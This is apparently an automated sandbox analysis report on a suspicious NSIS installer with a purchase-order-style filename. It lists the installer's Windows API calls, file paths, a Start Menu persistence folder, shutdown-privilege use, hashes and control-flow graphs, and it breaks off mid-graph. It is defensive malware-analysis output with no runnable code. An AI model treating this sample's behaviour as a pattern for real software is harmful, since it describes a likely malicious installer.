                                                                  • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe",00000000,?), ref: 00403A83
                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe",00000000,?), ref: 00403A8F
                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,00420F08,00000001), ref: 00403B21
                                                                • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                • OleUninitialize.OLE32(?), ref: 00403B71
                                                                • ExitProcess.KERNEL32 ref: 00403B8B
                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                • ExitProcess.KERNEL32 ref: 00403C1F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                • String ID: "C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous$C:\Users\user\Desktop$C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                • API String ID: 3859024572-734743977
                                                                • Opcode ID: c37161eddd1839db3a1dd77df7f1c87030544e8cf131142df7becf6cb2043db2
                                                                • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                • Opcode Fuzzy Hash: c37161eddd1839db3a1dd77df7f1c87030544e8cf131142df7becf6cb2043db2
                                                                • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                                APIs
                                                                  • Part of subcall function 6FC612BB: GlobalAlloc.KERNELBASE(00000040,?,6FC612DB,?,6FC6137F,00000019,6FC611CA,-000000A0), ref: 6FC612C5
                                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6FC61D2D
                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 6FC61D75
                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 6FC61D7F
                                                                • GlobalFree.KERNEL32(00000000), ref: 6FC61D92
                                                                • GlobalFree.KERNEL32(?), ref: 6FC61E74
                                                                • GlobalFree.KERNEL32(?), ref: 6FC61E79
                                                                • GlobalFree.KERNEL32(?), ref: 6FC61E7E
                                                                • GlobalFree.KERNEL32(00000000), ref: 6FC62068
                                                                • lstrcpyW.KERNEL32(?,?), ref: 6FC62222
                                                                • GetModuleHandleW.KERNEL32(00000008), ref: 6FC622A1
                                                                • LoadLibraryW.KERNEL32(00000008), ref: 6FC622B2
                                                                • GetProcAddress.KERNEL32(?,?), ref: 6FC6230C
                                                                • lstrlenW.KERNEL32(00000808), ref: 6FC62326
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true
                                                                • Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                • String ID:
                                                                • API String ID: 245916457-0
                                                                • Opcode ID: 11f4943c81eb118fe5fecc4f03b55151bcfa5a8e75cada2f64096377d6f14982
                                                                • Instruction ID: 0969f6c1383ea7bdd73aeeff7667945c010d30b659402accf30317cb29bc2ec4
                                                                • Opcode Fuzzy Hash: 11f4943c81eb118fe5fecc4f03b55151bcfa5a8e75cada2f64096377d6f14982
                                                                • Instruction Fuzzy Hash: 62229B71D0C60ADADF10CFA9C5D46EEB7B4FF05B1AF10462AD1A5E6280F770AA81CB51

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 741 405d74-405d9a call 40603f 744 405db3-405dba 741->744 745 405d9c-405dae DeleteFileW 741->745 747 405dbc-405dbe 744->747 748 405dcd-405ddd call 406668 744->748 746 405f30-405f34 745->746 749 405dc4-405dc7 747->749 750 405ede-405ee3 747->750 754 405dec-405ded call 405f83 748->754 755 405ddf-405dea lstrcatW 748->755 749->748 749->750 750->746 753 405ee5-405ee8 750->753 756 405ef2-405efa call 40699e 753->756 757 405eea-405ef0 753->757 758 405df2-405df6 754->758 755->758 756->746 764 405efc-405f10 call 405f37 call 405d2c 756->764 757->746 762 405e02-405e08 lstrcatW 758->762 763 405df8-405e00 758->763 765 405e0d-405e29 lstrlenW FindFirstFileW 762->765 763->762 763->765 781 405f12-405f15 764->781 782 405f28-405f2b call 4056ca 764->782 766 405ed3-405ed7 765->766 767 405e2f-405e37 765->767 766->750 772 405ed9 766->772 769 405e57-405e6b call 406668 767->769 770 405e39-405e41 767->770 783 405e82-405e8d call 405d2c 769->783 784 405e6d-405e75 769->784 773 405e43-405e4b 770->773 774 405eb6-405ec6 FindNextFileW 770->774 772->750 773->769 777 405e4d-405e55 773->777 774->767 780 405ecc-405ecd FindClose 774->780 777->769 777->774 780->766 781->757 785 405f17-405f26 call 4056ca call 406428 781->785 782->746 794 405eae-405eb1 call 4056ca 783->794 795 405e8f-405e92 783->795 784->774 786 405e77-405e80 call 405d74 784->786 785->746 786->774 794->774 798 405e94-405ea4 call 4056ca call 406428 795->798 799 405ea6-405eac 795->799 798->774 799->774
                                                                APIs
                                                                • DeleteFileW.KERNELBASE(?,?,75923420,75922EE0,00000000), ref: 00405D9D
                                                                • lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,75923420,75922EE0,00000000), ref: 00405DE5
                                                                • lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,75923420,75922EE0,00000000), ref: 00405E08
                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,75923420,75922EE0,00000000), ref: 00405E0E
                                                                • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,75923420,75922EE0,00000000), ref: 00405E1E
                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                • FindClose.KERNEL32(00000000), ref: 00405ECD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                • String ID: .$.$PWB$\*.*
                                                                • API String ID: 2035342205-2468439962
                                                                • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                APIs
                                                                • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                Strings
                                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous, xrefs: 00402269
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CreateInstance
                                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous
                                                                • API String ID: 542301482-647064374
                                                                • Opcode ID: bf3cff04906a8fef3a301f9eed657051bf574afb9f0f1a3cc87761232435f051
                                                                • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                • Opcode Fuzzy Hash: bf3cff04906a8fef3a301f9eed657051bf574afb9f0f1a3cc87761232435f051
                                                                • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(75923420,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0), ref: 004069A9
                                                                • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Find$CloseFileFirst
                                                                • String ID:
                                                                • API String ID: 2295610775-0
                                                                • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: FileFindFirst
                                                                • String ID:
                                                                • API String ID: 1974802433-0
                                                                • Opcode ID: 1358fc4729cd4e161e3f995057c9de5906a44dd4f8dff08d490623953bdc3ea8
                                                                • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                                • Opcode Fuzzy Hash: 1358fc4729cd4e161e3f995057c9de5906a44dd4f8dff08d490623953bdc3ea8
                                                                • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 143 405031-40507d GetDlgItem * 2 144 405083-40511b GlobalAlloc LoadImageW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 143->144 145 4052a8-4052af 143->145 148 40512a-405131 DeleteObject 144->148 149 40511d-405128 SendMessageW 144->149 146 4052b1-4052c1 145->146 147 4052c3 145->147 150 4052c6-4052cf 146->150 147->150 151 405133-40513b 148->151 149->148 152 4052d1-4052d4 150->152 153 4052da-4052e0 150->153 154 405164-405168 151->154 155 40513d-405140 151->155 152->153 156 4053be-4053c5 152->156 157 4052e2-4052e9 153->157 158 4052ef-4052f6 153->158 154->151 161 40516a-40519a call 4045c4 * 2 154->161 159 405142 155->159 160 405145-405162 call 4066a5 SendMessageW * 2 155->160 166 405436-40543e 156->166 167 4053c7-4053cd 156->167 157->156 157->158 162 4052f8-4052fb 158->162 163 40536b-40536e 158->163 159->160 160->154 200 4051a0-4051a6 161->200 201 40526a-40527d GetWindowLongW SetWindowLongW 161->201 171 405306-40531b call 404f7f 162->171 172 4052fd-405304 162->172 163->156 168 405370-40537a 163->168 169 405440-405446 SendMessageW 166->169 170 405448-40544f 166->170 175 4053d3-4053dd 167->175 176 405629-40563b call 40462b 167->176 177 40538a-405394 168->177 178 40537c-405388 SendMessageW 168->178 169->170 180 405451-405458 170->180 181 405483-40548a 170->181 171->163 199 40531d-40532e 171->199 172->163 172->171 175->176 184 4053e3-4053f2 SendMessageW 175->184 177->156 185 405396-4053a0 177->185 178->177 187 405461-405468 180->187 188 40545a-40545b ImageList_Destroy 180->188 191 405490-40549c call 4011ef 181->191 192 4055eb-4055f2 181->192 184->176 193 4053f8-405409 SendMessageW 184->193 195 4053b1-4053bb 185->195 196 4053a2-4053af 185->196 197 405471-40547d 187->197 198 40546a-40546b GlobalFree 187->198 188->187 211 4054ac-4054af 191->211 212 40549e-4054a1 191->212 192->176 194 4055f4-4055fb 192->194 203 405413-405415 193->203 204 40540b-405411 193->204 194->176 206 4055fd-405627 ShowWindow GetDlgItem ShowWindow 194->206 195->156 196->156 197->181 198->197 199->163 208 405330-405332 199->208 209 4051a9-4051af 200->209 207 405283-405286 201->207 205 405416-40542f call 401299 SendMessageW 203->205 204->203 204->205 205->166 206->176 214 4052a0-4052a3 call 4045f9 207->214 215 405288-40529b ShowWindow call 4045f9 207->215 216 405334-40533b 208->216 217 405345 208->217 218 4051b5-4051e0 209->218 219 40524c-40525f 209->219 226 4054f0-405514 call 4011ef 211->226 227 4054b1-4054ca call 4012e2 call 401299 211->227 223 4054a3 212->223 224 4054a4-4054a7 call 404fff 212->224 214->145 215->176 231 405341-405343 216->231 232 40533d-40533f 216->232 220 405348-405364 call 40117d 217->220 221 4051e2-40521a SendMessageW 218->221 222 40521c-40521e 218->222 219->209 228 405265-405268 219->228 220->163 221->219 234 405220-405232 SendMessageW 222->234 235 405234-405249 SendMessageW 222->235 223->224 224->211 243 4055b6-4055bf 226->243 244 40551a 226->244 253 4054da-4054e9 SendMessageW 227->253 254 4054cc-4054d2 227->254 228->201 228->207 231->220 232->220 234->219 235->219 248 4055c1-4055c7 InvalidateRect 243->248 249 4055cd-4055d5 243->249 246 40551d-405528 244->246 250 40552a-405539 246->250 251 40559e-4055b0 246->251 248->249 249->192 252 4055d7-4055e6 call 404f52 call 404f3a 249->252 255 40553b-405548 250->255 256 40554c-40554f 250->256 251->243 251->246 252->192 253->226 257 4054d4 254->257 258 4054d5-4054d8 254->258 255->256 260 405551-405554 256->260 261 405556-40555f 256->261 257->258 258->253 258->254 264 405564-40559c SendMessageW * 2 260->264 261->264 265 405561 261->265 264->251 265->264
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003F9), ref: 00405049
                                                                • GetDlgItem.USER32(?,00000408), ref: 00405054
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
                                                                • SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                  • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
                                                                • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                • GlobalFree.KERNEL32(?), ref: 0040546B
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                • GetDlgItem.USER32(?,000003FE), ref: 00405620
                                                                • ShowWindow.USER32(00000000), ref: 00405627
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                • String ID: $M$N
                                                                • API String ID: 2564846305-813528018
                                                                • Opcode ID: 950969970af6d10ef62121ad67a768569704eb6391eae900e1ce4f9d1827afee
                                                                • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                • Opcode Fuzzy Hash: 950969970af6d10ef62121ad67a768569704eb6391eae900e1ce4f9d1827afee
                                                                • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 266 4040c5-4040d7 267 4040dd-4040e3 266->267 268 40423e-40424d 266->268 267->268 269 4040e9-4040f2 267->269 270 40429c-4042b1 268->270 271 40424f-404297 GetDlgItem * 2 call 4045c4 SetClassLongW call 40140b 268->271 274 4040f4-404101 SetWindowPos 269->274 275 404107-40410e 269->275 272 4042f1-4042f6 call 404610 270->272 273 4042b3-4042b6 270->273 271->270 288 4042fb-404316 272->288 277 4042b8-4042c3 call 401389 273->277 278 4042e9-4042eb 273->278 274->275 280 404110-40412a ShowWindow 275->280 281 404152-404158 275->281 277->278 302 4042c5-4042e4 SendMessageW 277->302 278->272 287 404591 278->287 289 404130-404143 GetWindowLongW 280->289 290 40422b-404239 call 40462b 280->290 283 404171-404174 281->283 284 40415a-40416c DestroyWindow 281->284 294 404176-404182 SetWindowLongW 283->294 295 404187-40418d 283->295 291 40456e-404574 284->291 293 404593-40459a 287->293 298 404318-40431a call 40140b 288->298 299 40431f-404325 288->299 289->290 300 404149-40414c ShowWindow 289->300 290->293 291->287 305 404576-40457c 291->305 294->293 295->290 301 404193-4041a2 GetDlgItem 295->301 298->299 306 40432b-404336 299->306 307 40454f-404568 DestroyWindow EndDialog 299->307 300->281 309 4041c1-4041c4 301->309 310 4041a4-4041bb SendMessageW IsWindowEnabled 301->310 302->293 305->287 311 40457e-404587 ShowWindow 305->311 306->307 308 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 306->308 307->291 338 404393-4043cf ShowWindow KiUserCallbackDispatcher call 4045e6 EnableWindow 308->338 339 40438b-404390 308->339 313 4041c6-4041c7 309->313 314 4041c9-4041cc 309->314 310->287 310->309 311->287 316 4041f7-4041fc call 40459d 313->316 317 4041da-4041df 314->317 318 4041ce-4041d4 314->318 316->290 321 404215-404225 SendMessageW 317->321 323 4041e1-4041e7 317->323 318->321 322 4041d6-4041d8 318->322 321->290 322->316 326 